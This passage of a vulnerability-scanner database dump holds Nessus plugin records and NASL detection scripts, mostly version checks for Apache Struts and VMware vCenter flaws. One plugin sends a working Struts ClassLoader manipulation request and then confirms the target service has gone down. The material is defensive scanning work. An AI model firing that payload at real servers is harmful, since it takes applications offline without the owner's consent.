Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:23:33", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. The version of Struts 2 in use is affected by a security bypass vulnerability, possibly due to an incomplete fix for ClassLoader manipulation implemented in version 2.3.16.1.\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "nessus", "title": "Apache Struts 2 ClassLoader Manipulation Incomplete Fix for Security Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0112", "CVE-2014-0113"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_16_2_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/73763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73763);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0112\", 
\"CVE-2014-0113\");\n script_bugtraq_id(67064, 67081);\n script_xref(name:\"CERT\", value:\"719225\");\n\n script_name(english:\"Apache Struts 2 ClassLoader Manipulation Incomplete Fix for Security Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a security bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. The version of Struts 2 in use is affected by a security\nbypass vulnerability, possibly due to an incomplete fix for\nClassLoader manipulation implemented in version 2.3.16.1.\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/announce.html#a20140424\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-021.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.16.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0113\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Denial of Service\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = eregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = eregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = eregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nif (max_index(urls) == 0)\n 
audit(AUDIT_WEB_FILES_NOT, \"Struts 2 .action / .do / .jsp\", port);\n\nurls = list_uniq(urls);\n\nscript = SCRIPT_NAME - \".nasl\" + \"-\" + unixtime();\n\nforeach url (urls)\n{\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : url,\n exit_on_fail : TRUE\n );\n\n if (res[0] !~ \"404 Not Found\")\n {\n vuln_url = url + \"?class['classLoader']['resources']['dirContext']['docBase']=\" + script;\n\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n (res2[0] =~ \"200 OK|404 Not Found\")\n )\n { sleep(2);\n # One more check to ensure service is dead\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n if (res[0] =~ \"404 Not Found\")\n {\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n break;\n }\n }\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:30", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.28.1. It is, therefore, affected by the following vulnerabilities :\n\n - An unspecified flaw exists, related to chained expressions, when Dynamic Method Invocation (DMI) is enabled. An unauthenticated, remote attacker can exploit this, via a crafted expression, to execute arbitrary code. (CVE-2016-3081)\n\n - A flaw exists in XSLTResult due to a failure to sanitize user-supplied input to the 'location' parameter when determining the location of an uploaded stylesheet.\n An unauthenticated, remote attacker can exploit this, via a request to a crafted stylesheet, to execute arbitrary code. 
(CVE-2016-3082)\n\n - A flaw exists that is triggered when dynamic method invocation is enabled while using the REST plugin. A remote attacker can exploit this, via a specially crafted expression, to execute arbitrary code.\n (CVE-2016-3087) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-04-28T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.28.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3087"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/90773", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90773);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-3081\", \"CVE-2016-3082\", \"CVE-2016-3087\");\n script_bugtraq_id(87327);\n\n script_name(english:\"Apache Struts 2.x < 2.3.28.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior\nto 2.3.28.1. It is, therefore, affected by the following\nvulnerabilities :\n\n - An unspecified flaw exists, related to chained\n expressions, when Dynamic Method Invocation (DMI) is\n enabled. An unauthenticated, remote attacker can exploit\n this, via a crafted expression, to execute arbitrary\n code. 
(CVE-2016-3081)\n\n - A flaw exists in XSLTResult due to a failure to\n sanitize user-supplied input to the 'location' parameter\n when determining the location of an uploaded stylesheet.\n An unauthenticated, remote attacker can exploit this,\n via a request to a crafted stylesheet, to execute\n arbitrary code. (CVE-2016-3082)\n\n - A flaw exists that is triggered when dynamic method\n invocation is enabled while using the REST plugin. A\n remote attacker can exploit this, via a specially\n crafted expression, to execute arbitrary code.\n (CVE-2016-3087)\n \nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-031.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-032.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-033.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-23281.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28.1 or later. 
Alternatively,\napply the workarounds referenced in the vendor advisories.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts Dynamic Method Invocation Expression Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\n# Versions 2.3.20.3 and 2.3.24.3 are not affected\nif (app_info[\"version\"] == \"2.3.20.3\" || app_info[\"version\"] == \"2.3.24.3\")\n audit(AUDIT_INST_PATH_NOT_VULN, (\"Apache Struts 2 Application\"), app_info[\"version\"], app_info[\"path\"]);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"fixed_version\" : \"2.3.28.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:43", "description": "The version of vCenter Operations Manager installed on the remote host is prior to 5.8.2. It is, therefore, affected by the following vulnerabilities :\n\n - An error exists in the included Apache Tomcat version related to handling 'Content-Type' HTTP headers and multipart requests such as file uploads that could allow denial of service attacks. (CVE-2014-0050)\n\n - A security bypass error exists due to the included Apache Struts2 component, allowing manipulation of the ClassLoader via the 'class' parameter, which is directly mapped to the getClass() method. A remote, unauthenticated attacker can take advantage of this issue to manipulate the ClassLoader used by the application server, allowing for the bypass of certain security restrictions. 
Note that CVE-2014-0112 exists because CVE-2014-0094 was not a complete fix.\n (CVE-2014-0094, CVE-2014-0112)", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "nessus", "title": "VMware vCenter Operations Management Suite Multiple Vulnerabilities (VMSA-2014-0007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_operations"], "id": "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0007.NASL", "href": "https://www.tenable.com/plugins/nessus/76388", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76388);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\n\n script_cve_id(\"CVE-2014-0050\", \"CVE-2014-0094\", \"CVE-2014-0112\");\n script_bugtraq_id(65400, 65999, 67064);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n script_xref(name:\"IAVB\", value:\"2014-B-0090\");\n\n script_name(english:\"VMware vCenter Operations Management Suite Multiple Vulnerabilities (VMSA-2014-0007)\");\n script_summary(english:\"Checks version of vCenter Operations Manager.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vCenter Operations Manager installed on the remote host\nis prior to 5.8.2. It is, therefore, affected by the following\nvulnerabilities :\n\n - An error exists in the included Apache Tomcat version\n related to handling 'Content-Type' HTTP headers and\n multipart requests such as file uploads that could\n allow denial of service attacks. 
(CVE-2014-0050)\n\n - A security bypass error exists due to the included\n Apache Struts2 component, allowing manipulation of the\n ClassLoader via the 'class' parameter, which is directly\n mapped to the getClass() method. A remote,\n unauthenticated attacker can take advantage of this\n issue to manipulate the ClassLoader used by the\n application server, allowing for the bypass of certain\n security restrictions. Note that CVE-2014-0112 exists\n because CVE-2014-0094 was not a complete fix.\n (CVE-2014-0094, CVE-2014-0112)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000257.html\");\n # https://www.vmware.com/support/vcops/doc/vcops-582-vapp-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d46f364\");\n # https://www.vmware.com/support/vcops/doc/vcops-582-installable-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1fe3ac72\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2081470\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be20e92d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vCenter Operations Manager 5.7.3 / 5.8.2 or later.\n\nAlternatively, the vendor has provided a workaround for the security\nbypass error.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_operations\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Operations Manager/Version\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Operations Manager/Version\");\nfix = NULL;\n\n# 0.x - 4.x / 5.0.x - 5.6.x\n# - update with alt. version(s) when patch is available\nif (version =~ \"^([0-4]|5\\.[0-6])($|[^0-9])\")\n fix = \"5.8.2\";\n\n# 5.7.x < 5.7.3\nelse if (version =~ \"^5\\.7\\.\" && ver_compare(ver:version, fix:'5.7.3', strict:FALSE) < 0)\n fix = \"5.7.3\";\n\n# 5.8.x < 5.8.2\nelse if (version =~ \"^5\\.8\\.\" && ver_compare(ver:version, fix:'5.8.2', strict:FALSE) < 0)\n fix = \"5.8.2\";\n\nif (!isnull(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Operations Manager', version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:41", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.28. 
It is, therefore, affected by the following vulnerabilities :\n - A cross-site scripting vulnerability exists due to improper validation of user-supplied input when using a single byte page encoding. A remote attacker can exploit this, via non-spec URL-encoded parameter value including multi-byte characters. (CVE-2016-4003)\n\n - A remote code execution vulnerability exists due to double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2016-0785)\n\n - A cross-site scripting vulnerability exists due to improper validation of user-supplied input when using the I18NInterceptor. A remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-2162)\n\n - A denial of service vulnerability exists in the Object-Graph Navigation Language (OGNL) component due to a flaw in the implementation of the cache for stored method references. 
A context-dependent attacker can exploit this to block access to arbitrary websites.\n (CVE-2016-3093)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-03-24T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.28 Multiple Vulnerabilities (S2-028) (S2-029) (S2-030) (S2-034)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785", "CVE-2016-2162", "CVE-2016-3093", "CVE-2016-4003"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/90153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90153);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-0785\",\n \"CVE-2016-2162\",\n \"CVE-2016-3093\",\n \"CVE-2016-4003\"\n );\n script_bugtraq_id(\n 85066,\n 85070,\n 86311,\n 90961\n );\n\n script_name(english:\"Apache Struts 2.x < 2.3.28 Multiple Vulnerabilities (S2-028) (S2-029) (S2-030) (S2-034)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.28. It is, therefore, affected by the following\nvulnerabilities :\n - A cross-site scripting vulnerability exists due to\n improper validation of user-supplied input when using\n a single byte page encoding. A remote attacker can \n exploit this, via non-spec URL-encoded parameter value\n including multi-byte characters. 
(CVE-2016-4003)\n\n - A remote code execution vulnerability exists due to\n double OGNL evaluation of attribute values assigned to\n certain tags. An unauthenticated, remote attacker can\n exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2016-0785)\n\n - A cross-site scripting vulnerability exists due to\n improper validation of user-supplied input when using\n the I18NInterceptor. A remote attacker can exploit this,\n via a specially crafted request, to execute arbitrary\n script code in a user's browser session. (CVE-2016-2162)\n\n - A denial of service vulnerability exists in the\n Object-Graph Navigation Language (OGNL) component due to\n a flaw in the implementation of the cache for stored\n method references. A context-dependent attacker can\n exploit this to block access to arbitrary websites.\n (CVE-2016-3093)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-029.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-030.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-034.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2328.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28 or later. 
Alternatively,\napply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0785\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.24.1\", \"fixed_version\" : \"2.3.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:35", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.2. It, therefore, is affected by multiple Dynamic Method Invocation (DMI) vulnerabilities as DMI is enabled by default. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.2 Dynamic Method Invocation Multiple Vulnerabilities (S2-019)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4316"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_2_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/117402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117402);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4316\");\n script_bugtraq_id(62587);\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.2 Dynamic Method Invocation Multiple Vulnerabilities (S2-019)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple Dynamic Invocation Method vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.2. It, therefore, is affected by multiple\nDynamic Method Invocation (DMI) vulnerabilities as DMI is enabled\nby default. \n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.2 or later or follow the\nvendors instructions to disable DMI.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15.1\", \"fixed_version\" : \"2.3.15.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:19", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.3. It, therefore, is affected by a broken access control vulnerability which can be used to bypass security constraints.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.3 Broken Access Control Vulnerability (S2-018)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4310"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_3.NASL", "href": "https://www.tenable.com/plugins/nessus/117391", "sourceData": "#%NASL_MIN_LEVEL 